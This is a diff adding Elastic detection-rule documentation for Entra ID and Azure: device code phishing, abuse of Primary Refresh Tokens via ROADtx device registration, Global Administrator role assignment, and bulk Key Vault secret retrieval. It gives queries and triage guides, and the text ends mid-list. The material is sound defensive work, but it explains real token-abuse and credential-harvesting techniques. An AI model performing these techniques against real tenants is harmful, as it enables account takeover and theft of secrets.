b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-entra-id-device-code-auth-with-broker-client.asciidoc new file mode 100644 index 0000000000..5e6d08682a --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-entra-id-device-code-auth-with-broker-client.asciidoc @@ -0,0 +1,150 @@ +[[prebuilt-rule-8-19-8-entra-id-device-code-auth-with-broker-client]] +=== Entra ID Device Code Auth with Broker Client + +Identifies device code authentication with an Azure broker client for Entra ID. Adversaries abuse Primary Refresh Tokens (PRTs) to bypass multi-factor authentication (MFA) and gain unauthorized access to Azure resources. PRTs are used in Conditional Access policies to enforce device-based controls. Compromising PRTs allows attackers to bypass these policies and gain unauthorized access. This rule detects successful sign-ins using device code authentication with the Entra ID broker client application ID (29d9ed98-a469-4536-ade2-f981bc1d605e). 
+ +*Rule type*: query + +*Rule indices*: + +* filebeat-* +* logs-azure.signinlogs-* +* logs-azure.activitylogs-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://dirkjanm.io/assets/raw/Phishing%20the%20Phishing%20Resistant.pdf +* https://learn.microsoft.com/en-us/troubleshoot/azure/entra/entra-id/governance/verify-first-party-apps-sign-in +* https://learn.microsoft.com/en-us/azure/azure-monitor/reference/tables/signinlogs + +*Tags*: + +* Domain: Cloud +* Data Source: Azure +* Data Source: Microsoft Entra ID +* Use Case: Identity and Access Audit +* Tactic: Initial Access +* Resources: Investigation Guide + +*Version*: 5 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Entra ID Device Code Auth with Broker Client* + + +Entra ID Device Code Authentication allows users to authenticate devices using a code, facilitating seamless access to Azure resources. Adversaries exploit this by compromising Primary Refresh Tokens (PRTs) to bypass multi-factor authentication and Conditional Access policies. The detection rule identifies unauthorized access attempts by monitoring successful sign-ins using device code authentication linked to a specific broker client application ID, flagging potential misuse. + + +*Possible investigation steps* + + +- Review the sign-in logs to confirm the use of device code authentication by checking the field azure.signinlogs.properties.authentication_protocol for the value deviceCode. +- Verify the application ID involved in the sign-in attempt by examining azure.signinlogs.properties.conditional_access_audiences.application_id and ensure it matches 29d9ed98-a469-4536-ade2-f981bc1d605e. +- Investigate the user account associated with the successful sign-in to determine if the activity aligns with expected behavior or if it appears suspicious. +- Check for any recent changes or anomalies in the user's account settings or permissions that could indicate compromise. +- Review the history of sign-ins for the user to identify any patterns or unusual access times that could suggest unauthorized access. +- Assess the device from which the sign-in was attempted to ensure it is a recognized and authorized device for the user. + + +*False positive analysis* + + +- Legitimate device code authentication by trusted applications or users may trigger the rule. Review the application ID and user context to confirm legitimacy. +- Frequent access by automated scripts or services using device code authentication can be mistaken for unauthorized access. Identify and document these services, then create exceptions for known application IDs. +- Shared devices in environments with multiple users may cause false positives if device code authentication is used regularly. Implement user-specific logging to differentiate between legitimate and suspicious activities. +- Regular maintenance or updates by IT teams using device code authentication might be flagged. 
Coordinate with IT to schedule these activities and temporarily adjust monitoring rules if necessary. +- Ensure that any exceptions or exclusions are regularly reviewed and updated to reflect changes in the environment or application usage patterns. + + +*Response and remediation* + + +- Immediately revoke the compromised Primary Refresh Tokens (PRTs) to prevent further unauthorized access. This can be done through the Azure portal by navigating to the user's account and invalidating all active sessions. +- Enforce a password reset for the affected user accounts to ensure that any credentials potentially compromised during the attack are no longer valid. +- Implement additional Conditional Access policies that require device compliance checks and restrict access to trusted locations or devices only, to mitigate the risk of future PRT abuse. +- Conduct a thorough review of the affected accounts' recent activity logs to identify any unauthorized actions or data access that may have occurred during the compromise. +- Escalate the incident to the security operations team for further investigation and to determine if there are any broader implications or additional compromised accounts. +- Enhance monitoring by configuring alerts for unusual sign-in patterns or device code authentication attempts from unexpected locations or devices, to improve early detection of similar threats. +- Coordinate with the incident response team to perform a post-incident analysis and update the incident response plan with lessons learned from this event. + +==== Setup + + +This rule optionally requires Azure Sign-In logs from the Azure integration. Ensure that the Azure integration is correctly set up and that the required data is being collected. + + +==== Rule query + + +[source, js] +---------------------------------- + event.dataset:(azure.activitylogs or azure.signinlogs) + and azure.signinlogs.properties.authentication_protocol:deviceCode + and azure.signinlogs.properties.conditional_access_audiences.application_id:29d9ed98-a469-4536-ade2-f981bc1d605e + and event.outcome:success or ( + azure.activitylogs.properties.appId:29d9ed98-a469-4536-ade2-f981bc1d605e + and azure.activitylogs.properties.authentication_protocol:deviceCode) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Initial Access +** ID: TA0001 +** Reference URL: https://attack.mitre.org/tactics/TA0001/ +* Technique: +** Name: Phishing +** ID: T1566 +** Reference URL: https://attack.mitre.org/techniques/T1566/ +* Sub-technique: +** Name: Spearphishing Link +** ID: T1566.002 +** Reference URL: https://attack.mitre.org/techniques/T1566/002/ +* Technique: +** Name: Valid Accounts +** ID: T1078 +** Reference URL: https://attack.mitre.org/techniques/T1078/ +* Sub-technique: +** Name: Cloud Accounts +** ID: T1078.004 +** Reference URL: https://attack.mitre.org/techniques/T1078/004/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Use Alternate Authentication Material +** ID: T1550 +** Reference URL: https://attack.mitre.org/techniques/T1550/ +* Sub-technique: +** Name: Application Access Token +** ID: T1550.001 +** Reference URL: https://attack.mitre.org/techniques/T1550/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-entra-id-global-administrator-role-assigned.asciidoc 
b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-entra-id-global-administrator-role-assigned.asciidoc new file mode 100644 index 0000000000..249363ec42 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-entra-id-global-administrator-role-assigned.asciidoc @@ -0,0 +1,122 @@ +[[prebuilt-rule-8-19-8-entra-id-global-administrator-role-assigned]] +=== Entra ID Global Administrator Role Assigned + +In Microsoft Entra ID, permissions to manage resources are assigned using roles. The Global Administrator is a role that enables users to have access to all administrative features in Microsoft Entra ID and services that use Microsoft Entra ID identities like the Microsoft 365 Defender portal, the Microsoft 365 compliance center, Exchange, SharePoint Online, and Skype for Business Online. Attackers can add users as Global Administrators to maintain access and manage all subscriptions and their settings and resources. They can also elevate privilege to User Access Administrator to pivot into Azure resources. + +*Rule type*: query + +*Rule indices*: + +* filebeat-* +* logs-azure.auditlogs-* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://securitylabs.datadoghq.com/articles/i-spy-escalating-to-entra-id-global-admin/ +* https://docs.microsoft.com/en-us/azure/active-directory/roles/permissions-reference#global-administrator +* https://www.microsoft.com/en-us/security/blog/2025/08/27/storm-0501s-evolving-techniques-lead-to-cloud-based-ransomware/ + +*Tags*: + +* Domain: Cloud +* Domain: Identity +* Data Source: Azure +* Data Source: Microsoft Entra ID +* Data Source: Microsoft Entra ID Audit Logs +* Use Case: Identity and Access Audit +* Tactic: Persistence +* Resources: Investigation Guide + +*Version*: 106 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Entra ID Global Administrator Role Assigned* + + +Microsoft Entra ID's Global Administrator role grants comprehensive access to manage Microsoft Entra ID and associated services. Adversaries may exploit this by assigning themselves or others to this role, ensuring persistent control over resources. The detection rule identifies such unauthorized assignments by monitoring specific audit logs for role changes, focusing on the addition of members to the Global Administrator role, thus helping to mitigate potential security breaches. + + +*Possible investigation steps* + + +- Review the Microsoft Entra ID audit logs to identify the user account that performed the "Add member to role" operation, focusing on the specific event dataset and operation name. +- Verify the identity of the user added to the Global Administrator role by examining the modified properties in the audit logs, specifically the new_value field indicating "Global Administrator". +- Check the history of role assignments for the identified user to determine if this is a recurring pattern or a one-time event. +- Investigate the source IP address and location associated with the role assignment event to assess if it aligns with expected user behavior or if it indicates potential unauthorized access. 
+- Review any recent changes or activities performed by the newly assigned Global Administrator to identify any suspicious actions or configurations that may have been altered. +- Consult with the organization's IT or security team to confirm if the role assignment was authorized and aligns with current administrative needs or projects. +- Correlate with Microsoft Entra ID sign-in logs to check for any unusual login patterns or failed login attempts associated with the user who assigned the role. +- Review the reported device to determine if it is a known and trusted device or if it raises any security concerns such as unexpected relationships with the source user. + + +*False positive analysis* + + +- Routine administrative tasks may trigger alerts when legitimate IT staff are assigned the Global Administrator role temporarily for maintenance or configuration purposes. To manage this, create exceptions for known IT personnel or scheduled maintenance windows. +- Automated scripts or third-party applications that require elevated permissions might be flagged if they are configured to add users to the Global Administrator role. Review and whitelist these scripts or applications if they are verified as safe and necessary for operations. +- Organizational changes, such as mergers or restructuring, can lead to legitimate role assignments that appear suspicious. Implement a review process to verify these changes and exclude them from triggering alerts if they align with documented organizational changes. +- Training or onboarding sessions for new IT staff might involve temporary assignment to the Global Administrator role. Establish a protocol to document and exclude these training-related assignments from detection alerts. + + +*Response and remediation* + + +- Immediately remove any unauthorized users from the Global Administrator role to prevent further unauthorized access and control over Azure AD resources. +- Conduct a thorough review of recent audit logs to identify any additional unauthorized changes or suspicious activities associated with the compromised account or role assignments. +- Reset the credentials of the affected accounts and enforce multi-factor authentication (MFA) to enhance security and prevent further unauthorized access. +- Notify the security operations team and relevant stakeholders about the incident for awareness and further investigation. +- Implement conditional access policies to restrict Global Administrator role assignments to specific, trusted locations or devices. +- Review and update role assignment policies to ensure that only a limited number of trusted personnel have the ability to assign Global Administrator roles. +- Enhance monitoring and alerting mechanisms to detect similar unauthorized role assignments in the future, ensuring timely response to potential threats. 
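+
+Several of the triage steps above pivot on the account that performed the "Add member to role" operation. As an illustrative starting point only (this is not part of the prebuilt rule), an ES|QL hunt along the following lines can summarize what other role-management operations that same initiator has performed; the `admin@example.com` value is a placeholder for the `azure.auditlogs.properties.initiated_by.user.userPrincipalName` observed in the alert, and field availability depends on your Azure integration mappings.
+
+[source, js]
+----------------------------------
+from logs-azure.auditlogs-*
+| where event.dataset == "azure.auditlogs"
+    and azure.auditlogs.properties.category == "RoleManagement"
+    and azure.auditlogs.properties.initiated_by.user.userPrincipalName == "admin@example.com"
+| stats Esql.operation_count = count(*) by azure.auditlogs.operation_name
+| sort Esql.operation_count desc
+----------------------------------
+
+A burst of unfamiliar role-management operations from the same initiator around the alert time strengthens the case for treating the assignment as unauthorized.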
+ + +==== Rule query + + +[source, js] +---------------------------------- +event.dataset:azure.auditlogs and + azure.auditlogs.properties.category:RoleManagement and + azure.auditlogs.operation_name:"Add member to role" and + azure.auditlogs.properties.target_resources.*.modified_properties.*.new_value: "\"Global Administrator\"" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Account Manipulation +** ID: T1098 +** Reference URL: https://attack.mitre.org/techniques/T1098/ +* Sub-technique: +** Name: Additional Cloud Roles +** ID: T1098.003 +** Reference URL: https://attack.mitre.org/techniques/T1098/003/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-entra-id-rt-to-prt-transition-from-same-user-and-device.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-entra-id-rt-to-prt-transition-from-same-user-and-device.asciidoc new file mode 100644 index 0000000000..7c477df21a --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-entra-id-rt-to-prt-transition-from-same-user-and-device.asciidoc @@ -0,0 +1,148 @@ +[[prebuilt-rule-8-19-8-entra-id-rt-to-prt-transition-from-same-user-and-device]] +=== Entra ID RT to PRT Transition from Same User and Device + +Identifies when a user signs in with a refresh token using the Microsoft Authentication Broker (MAB) client, followed by a Primary Refresh Token (PRT) sign-in from the same device within 1 hour. This pattern may indicate that an attacker has successfully registered a device using ROADtx and transitioned from short-term token access to long-term persistent access via PRTs. Excluding access to the Device Registration Service (DRS) ensures the PRT is being used beyond registration, often to access Microsoft 365 resources like Outlook or SharePoint. + +*Rule type*: eql + +*Rule indices*: + +* filebeat-* +* logs-azure.signinlogs-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 30m + +*Searches indices from*: now-60m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.volexity.com/blog/2025/04/22/phishing-for-codes-russian-threat-actors-target-microsoft-365-oauth-workflows/ +* https://dirkjanm.io/abusing-azure-ad-sso-with-the-primary-refresh-token/ + +*Tags*: + +* Domain: Cloud +* Domain: Identity +* Use Case: Threat Detection +* Data Source: Azure +* Data Source: Microsoft Entra ID +* Data Source: Microsoft Entra ID Sign-In Logs +* Tactic: Persistence +* Tactic: Initial Access +* Resources: Investigation Guide + +*Version*: 2 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Entra ID RT to PRT Transition from Same User and Device* + + +This rule identifies a sequence where a Microsoft Entra ID user signs in using a refresh token issued to the Microsoft Authentication Broker (MAB), followed by a sign-in using a Primary Refresh Token (PRT) from the same device. This behavior is uncommon for normal user activity and strongly suggests adversarial behavior, particularly when paired with OAuth phishing and device registration tools like ROADtx. 
The use of PRT shortly after a refresh token sign-in typically indicates the attacker has obtained device trust and is now using the PRT to impersonate a fully compliant user+device pair. + + +*Possible investigation steps* + +- Identify the user principal and device from `azure.signinlogs.properties.user_principal_name` and `azure.signinlogs.properties.device_detail.device_id`. +- Confirm the first sign-in event came from the Microsoft Auth Broker (`app_id`) with `incoming_token_type: refreshToken`. +- Ensure the device has a `trust_type` of "Azure AD joined" and that the `sign_in_session_status` is "unbound". +- Confirm the second sign-in used `incoming_token_type: primaryRefreshToken` and that the `resource_display_name` is not "Device Registration Service". +- Investigate any Microsoft Graph, Outlook, or SharePoint access occurring shortly after. +- Review conditional access policy outcomes and determine whether MFA or device compliance was bypassed. + + +*False positive analysis* + +- Legitimate device onboarding and sign-ins using hybrid-joined endpoints may trigger this rule. +- Rapid device provisioning in enterprise environments using MAB could generate similar token behavior. +- Use supporting signals, such as IP address changes, geolocation, or user agent anomalies, to reduce noise. + + +*Response and remediation* + +- Investigate other sign-in patterns and assess whether token abuse has occurred. +- Revoke PRT sessions via Microsoft Entra ID or Conditional Access. +- Remove or quarantine the suspicious device registration. +- Require password reset and enforce MFA. +- Audit and tighten device trust and conditional access configurations. + + +==== Rule query + + +[source, js] +---------------------------------- +sequence by azure.signinlogs.properties.user_id, azure.signinlogs.properties.device_detail.device_id with maxspan=1h + [authentication where + event.dataset == "azure.signinlogs" and + azure.signinlogs.category == "NonInteractiveUserSignInLogs" and + azure.signinlogs.properties.app_id == "29d9ed98-a469-4536-ade2-f981bc1d605e" and + azure.signinlogs.properties.incoming_token_type == "refreshToken" and + azure.signinlogs.properties.device_detail.trust_type == "Azure AD joined" and + azure.signinlogs.properties.device_detail.device_id != null and + azure.signinlogs.properties.token_protection_status_details.sign_in_session_status == "unbound" and + azure.signinlogs.properties.user_type == "Member" and + azure.signinlogs.result_signature == "SUCCESS" + ] + [authentication where + event.dataset == "azure.signinlogs" and + azure.signinlogs.properties.incoming_token_type == "primaryRefreshToken" and + azure.signinlogs.properties.resource_display_name != "Device Registration Service" and + azure.signinlogs.result_signature == "SUCCESS" + ] + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Valid Accounts +** ID: T1078 +** Reference URL: https://attack.mitre.org/techniques/T1078/ +* Sub-technique: +** Name: Cloud Accounts +** ID: T1078.004 +** Reference URL: https://attack.mitre.org/techniques/T1078/004/ +* Technique: +** Name: Account Manipulation +** ID: T1098 +** Reference URL: https://attack.mitre.org/techniques/T1098/ +* Sub-technique: +** Name: Device Registration +** ID: T1098.005 +** Reference URL: https://attack.mitre.org/techniques/T1098/005/ +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: 
https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: Steal Application Access Token +** ID: T1528 +** Reference URL: https://attack.mitre.org/techniques/T1528/ +* Tactic: +** Name: Initial Access +** ID: TA0001 +** Reference URL: https://attack.mitre.org/tactics/TA0001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-excessive-secret-or-key-retrieval-from-azure-key-vault.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-excessive-secret-or-key-retrieval-from-azure-key-vault.asciidoc new file mode 100644 index 0000000000..aceed24bea --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-excessive-secret-or-key-retrieval-from-azure-key-vault.asciidoc @@ -0,0 +1,206 @@ +[[prebuilt-rule-8-19-8-excessive-secret-or-key-retrieval-from-azure-key-vault]] +=== Excessive Secret or Key Retrieval from Azure Key Vault + +Identifies excessive secret or key retrieval operations from Azure Key Vault. This rule detects when a user principal retrieves secrets or keys from Azure Key Vault multiple times within a short time frame, which may indicate potential abuse or unauthorized access attempts. The rule focuses on high-frequency retrieval operations that deviate from normal user behavior, suggesting possible credential harvesting or misuse of sensitive information. + +*Rule type*: esql + +*Rule indices*: None + +*Severity*: medium + +*Risk score*: 43 + +*Runs every*: 8m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.inversecos.com/2022/05/detection-and-compromise-azure-key.html + +*Tags*: + +* Domain: Cloud +* Domain: Storage +* Domain: Identity +* Data Source: Azure +* Data Source: Azure Platform Logs +* Data Source: Azure Key Vault +* Use Case: Threat Detection +* Use Case: Identity and Access Audit +* Tactic: Credential Access +* Resources: Investigation Guide + +*Version*: 3 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Excessive Secret or Key Retrieval from Azure Key Vault* + + +Azure Key Vault is a cloud service that safeguards encryption keys and secrets like certificates, connection strings, and passwords. It is crucial for managing sensitive data in Azure environments. Unauthorized modifications to Key Vaults can lead to data breaches or service disruptions. This rule detects excessive secret or key retrieval operations from Azure Key Vault, which may indicate potential abuse or unauthorized access attempts. + + +*Possible investigation steps* + +- Review the `azure.platformlogs.identity.claim.upn` field to identify the user principal making the retrieval requests. This can help determine if the activity is legitimate or suspicious. +- Check the `azure.platformlogs.identity.claim.appid` or `azure.platformlogs.identity.claim.appid_display_name` to identify the application or service making the requests. If the application is not recognized or authorized, it may indicate a potential security incident. It is plausible that the application is a FOCI compliant application, which are commonly abused by adversaries to evade security controls or conditional access policies. +- Analyze the `azure.platformlogs.resource.name` field to determine which Key Vault is being accessed. 
This can help assess the impact of the retrieval operations and whether they target sensitive resources. +- Review the `event.action` field to confirm the specific actions being performed, such as `KeyGet`, `SecretGet`, or `CertificateGet`. These actions indicate retrieval of keys, secrets, or certificates from the Key Vault. +- Check the `source.ip` or `geo.*` fields to identify the source of the retrieval requests. Look for unusual or unexpected IP addresses, especially those associated with known malicious activity or geographic locations that do not align with the user's typical behavior. +- Use the `time_window` field to analyze the frequency of retrieval operations. If multiple retrievals occur within a short time frame (e.g., within a few minutes), it may indicate excessive or suspicious activity. +- Correlate the retrieval operations with other security events or alerts in the environment to identify any patterns or related incidents. +- Triage the user with Entra ID sign-in logs to gather more context about their authentication behavior and any potential anomalies. + + +*False positive analysis* + +- Routine administrative tasks or automated scripts may trigger excessive retrievals, especially in environments where Key Vaults are heavily utilized for application configurations or secrets management. If this is expected behavior, consider adjusting the rule or adding exceptions for specific applications or user principals. +- Legitimate applications or services may perform frequent retrievals of keys or secrets for operational purposes, such as configuration updates or secret rotation. If this is expected behavior, consider adjusting the rule or adding exceptions for specific applications or user principals. +- Security teams may perform periodic audits or assessments that involve retrieving keys or secrets from Key Vaults. If this is expected behavior, consider adjusting the rule or adding exceptions for specific user principals or applications. +- Some applications may require frequent access to keys or secrets for normal operation, leading to high retrieval counts. If this is expected behavior, consider adjusting the rule or adding exceptions for specific applications or user principals. + + +*Response and remediation* + +- Investigate the user principal making the excessive retrieval requests to determine if they are authorized to access the Key Vault and its contents. If the user is not authorized, take appropriate actions to block their access and prevent further unauthorized retrievals. +- Review the application or service making the requests to ensure it is legitimate and authorized to access the Key Vault. If the application is unauthorized or suspicious, consider blocking it and revoking its permissions to access the Key Vault. +- Assess the impact of the excessive retrieval operations on the Key Vault and its contents. Determine if any sensitive data was accessed or compromised during the retrievals. +- Implement additional monitoring and alerting for the Key Vault to detect any further suspicious activity or unauthorized access attempts. +- Consider implementing stricter access controls or policies for Key Vaults to limit excessive retrievals and ensure that only authorized users and applications can access sensitive keys and secrets. +- Educate users and administrators about the risks associated with excessive retrievals from Key Vaults and encourage them to follow best practices for managing keys and secrets in Azure environments. 
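+
+As a follow-up to the investigation steps above, the ES|QL sketch below (illustrative only, not part of the rule) breaks a single principal's retrievals down by vault and operation so the scope of exposure is easier to judge; replace the placeholder `user@example.com` with the `azure.platformlogs.identity.claim.upn` value from the alert, and adjust the action list to the operations seen in your environment.
+
+[source, js]
+----------------------------------
+from logs-azure.platformlogs-*
+| where event.dataset == "azure.platformlogs"
+    and azure.platformlogs.identity.claim.upn == "user@example.com"
+    and event.action in ("KeyGet", "SecretGet", "CertificateGet")
+| stats
+    Esql.event_count = count(*),
+    Esql.source_ip_values = values(source.ip)
+  by azure.resource.name, event.action
+| sort Esql.event_count desc
+----------------------------------
+
+Retrievals spread across many vaults, or sourced from unexpected IP addresses, point toward harvesting rather than routine application access.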
+ + +==== Setup + + + +*Required Azure Key Vault Diagnostic Logs* + + +To ensure this rule functions correctly, the following diagnostic logs must be enabled for Azure Key Vault: +- AuditEvent: This log captures all read and write operations performed on the Key Vault, including secret, key, and certificate retrievals. These logs should be streamed to the Event Hub used for the Azure integration configuration. + + +==== Rule query + + +[source, js] +---------------------------------- +from logs-azure.platformlogs-* metadata _id, _index + +// Filter for Azure Key Vault read operations +| where event.dataset == "azure.platformlogs" + and event.action in ( + "VaultGet", + "KeyGet", + "KeyList", + "KeyListVersions", + "KeyGetDeleted", + "KeyListDeleted", + "SecretGet", + "SecretList", + "SecretListVersions", + "SecretGetDeleted", + "SecretListDeleted", + "CertificateGet", + "CertificateList", + "CertificateListVersions", + "CertificateGetDeleted", + "CertificateListDeleted", + "CertificatePolicyGet", + "CertificateContactsGet", + "CertificateIssuerGet", + "CertificateIssuersList" + ) + +// Truncate timestamps into 1-minute windows +| eval Esql.time_window_date_trunc = date_trunc(1 minute, @timestamp) + +// Aggregate identity, geo, resource, and activity info +| stats + Esql_priv.azure_platformlogs_identity_claim_upn_values = values(azure.platformlogs.identity.claim.upn), + Esql.azure_platformlogs_identity_claim_upn_count_distinct = count_distinct(azure.platformlogs.identity.claim.upn), + Esql.azure_platformlogs_identity_claim_appid_values = values(azure.platformlogs.identity.claim.appid), + + Esql.source_ip_values = values(source.ip), + Esql.geo_city_values = values(geo.city_name), + Esql.geo_region_values = values(geo.region_name), + Esql.geo_country_values = values(geo.country_name), + Esql.source_as_organization_name_values = values(source.as.organization.name), + + Esql.event_action_values = values(event.action), + Esql.event_count = count(*), + Esql.event_action_count_distinct = count_distinct(event.action), + Esql.azure_resource_name_count_distinct = count_distinct(azure.resource.name), + Esql.azure_resource_name_values = values(azure.resource.name), + Esql.azure_platformlogs_result_type_values = values(azure.platformlogs.result_type), + Esql.cloud_region_values = values(cloud.region), + + Esql.agent_name_values = values(agent.name), + Esql.azure_subscription_id_values = values(azure.subscription_id), + Esql.azure_resource_group_values = values(azure.resource.group), + Esql.azure_resource_id_values = values(azure.resource.id) + +by Esql.time_window_date_trunc, azure.platformlogs.identity.claim.upn + +// keep relevant fields +| keep + Esql.time_window_date_trunc, + Esql_priv.azure_platformlogs_identity_claim_upn_values, + Esql.azure_platformlogs_identity_claim_upn_count_distinct, + Esql.azure_platformlogs_identity_claim_appid_values, + Esql.source_ip_values, + Esql.geo_city_values, + Esql.geo_region_values, + Esql.geo_country_values, + Esql.source_as_organization_name_values, + Esql.event_action_values, + Esql.event_count, + Esql.event_action_count_distinct, + Esql.azure_resource_name_count_distinct, + Esql.azure_resource_name_values, + Esql.azure_platformlogs_result_type_values, + Esql.cloud_region_values, + Esql.agent_name_values, + Esql.azure_subscription_id_values, + Esql.azure_resource_group_values, + Esql.azure_resource_id_values + +// Filter for suspiciously high volume of distinct Key Vault reads by a single actor +| where Esql.azure_platformlogs_identity_claim_upn_count_distinct 
== 1 and Esql.event_count >= 10 and Esql.event_action_count_distinct >= 2 + +| sort Esql.time_window_date_trunc desc + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: Credentials from Password Stores +** ID: T1555 +** Reference URL: https://attack.mitre.org/techniques/T1555/ +* Sub-technique: +** Name: Cloud Secrets Management Stores +** ID: T1555.006 +** Reference URL: https://attack.mitre.org/techniques/T1555/006/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-first-occurrence-of-entra-id-auth-via-devicecode-protocol.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-first-occurrence-of-entra-id-auth-via-devicecode-protocol.asciidoc new file mode 100644 index 0000000000..759e2b9363 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-first-occurrence-of-entra-id-auth-via-devicecode-protocol.asciidoc @@ -0,0 +1,173 @@ +[[prebuilt-rule-8-19-8-first-occurrence-of-entra-id-auth-via-devicecode-protocol]] +=== First Occurrence of Entra ID Auth via DeviceCode Protocol + +Identifies when a user is observed for the first time in the last 14 days authenticating using the device code authentication workflow. This authentication workflow can be abused by attackers to phish users and steal access tokens to impersonate the victim. By its very nature, device code should only be used when logging in to devices without keyboards, where it is difficult to enter emails and passwords. + +*Rule type*: new_terms + +*Rule indices*: + +* filebeat-* +* logs-azure.signinlogs-* +* logs-azure.activitylogs-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://aadinternals.com/post/phishing/ +* https://www.blackhillsinfosec.com/dynamic-device-code-phishing/ +* https://www.volexity.com/blog/2025/02/13/multiple-russian-threat-actors-targeting-microsoft-device-code-authentication/ +* https://learn.microsoft.com/en-us/entra/identity/conditional-access/concept-authentication-flows + +*Tags*: + +* Domain: Cloud +* Data Source: Azure +* Data Source: Microsoft Entra ID +* Use Case: Identity and Access Audit +* Tactic: Initial Access +* Resources: Investigation Guide + +*Version*: 6 + +*Rule authors*: + +* Elastic +* Matteo Potito Giorgio + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating First Occurrence of Entra ID Auth via DeviceCode Protocol* + + +This rule detects the first instance of a user authenticating via the **DeviceCode** authentication protocol within a **14-day window**. The **DeviceCode** authentication workflow is designed for devices that lack keyboards, such as IoT devices and smart TVs. However, adversaries can abuse this mechanism by phishing users and stealing authentication tokens, leading to unauthorized access. + + +*Possible Investigation Steps* + + + +*Identify the User and Authentication Details* + +- **User Principal Name (UPN)**: Review `azure.signinlogs.properties.user_principal_name` to identify the user involved in the authentication event. +- **User ID**: Check `azure.signinlogs.properties.user_id` for a unique identifier of the affected account. 
+- **Authentication Protocol**: Confirm that `azure.signinlogs.properties.authentication_protocol` is set to `deviceCode`. +- **Application Used**: Verify the application through `azure.signinlogs.properties.app_display_name` and `azure.signinlogs.properties.app_id` to determine if it is an expected application. + + +*Review the Source IP and Geolocation* + +- **Source IP Address**: Check `source.ip` and compare it with previous authentication logs to determine whether the login originated from a trusted or expected location. +- **Geolocation Details**: Analyze `source.geo.city_name`, `source.geo.region_name`, and `source.geo.country_name` to confirm whether the login location is suspicious. +- **ASN / ISP Details**: Review `source.as.organization.name` to check if the IP is associated with a known organization or cloud provider. + + +*Examine Multi-Factor Authentication (MFA) and Conditional Access* + +- **MFA Enforcement**: Review `azure.signinlogs.properties.applied_conditional_access_policies` to determine if MFA was enforced during the authentication. +- **Conditional Access Policies**: Check `azure.signinlogs.properties.conditional_access_status` to understand if conditional access policies were applied and if any controls were bypassed. +- **Authentication Method**: Look at `azure.signinlogs.properties.authentication_details` to confirm how authentication was satisfied (e.g., MFA via claim in token). + + +*Validate Device and Client Details* + +- **Device Information**: Review `azure.signinlogs.properties.device_detail.browser` to determine if the login aligns with the expected behavior of a device that lacks a keyboard. +- **User-Agent Analysis**: Inspect `user_agent.original` for anomalies, such as an unexpected operating system or browser. +- **Client Application**: Verify `azure.signinlogs.properties.client_app_used` to confirm whether the login was performed using a known client. + + +*Investigate Related Activities* + +- **Correlate with Phishing Attempts**: Check if the user recently reported phishing attempts or suspicious emails. +- 